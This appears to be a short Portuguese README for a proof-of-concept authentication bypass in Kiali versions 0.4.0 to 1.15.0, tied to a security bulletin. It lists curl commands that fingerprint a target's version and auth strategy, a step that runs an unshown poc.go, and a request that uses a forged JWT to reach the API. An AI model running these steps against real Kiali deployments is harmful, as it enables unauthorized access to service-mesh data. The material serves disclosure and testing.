
PoC de Bypass de Autenticação para o Kiali
Prova de Conceito de bypass de autenticação para Kiali 0.4.0 a 1.15.0 usando estratégia de autenticação de login (Boletim de Segurança)
verificar versão: curl 'http://<IP>/api
verificar estratégia de autenticação: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"